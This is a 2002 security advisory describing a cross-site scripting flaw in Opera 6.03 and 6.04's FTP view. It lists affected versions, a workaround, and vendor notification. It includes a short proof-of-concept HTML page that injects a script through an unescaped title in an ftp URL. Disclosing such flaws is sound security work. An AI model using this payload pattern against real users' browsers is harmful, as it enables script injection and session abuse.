Title:

Opera FTP View Cross-Site Scripting Vulnerability

Date:

4 August 2002 (Last modified: )

Author:

Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]
penetration technique research site [Advisories]

Risk:

Medium

Vulnerable:

Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04

Not vulnerable:

Opera 6.05

Bugtraq ID:

5401

Overview:

Opera allows running Malicious Scripts due to a bug in 'FTP view' feature.
If you click on a malicious link, the script embedded in URL will run.

* If the ftp server and the http server are the same address, it is dangerous.
  Because the cookie may be modified by the attacker.
I revised this advisory.
I confirmed that a cookie wasn't modified by this vulnerability. 

Details:

This problem is in 'FTP view' feature.
The '<title>URL</title>' is not escaped.

Exploit code:

<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Demonstration:

screen shot

Workaround:

Disable JavaScript.

Vendor status:

Opera Software ASA was notified on 30 June 2002.

Similar vulnerabilities:

Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution Vulnerability

Mozilla FTP View Cross-Site Scripting Vulnerability

 Copyright(c) 2002 Eiji James Yoshida. All rights reserved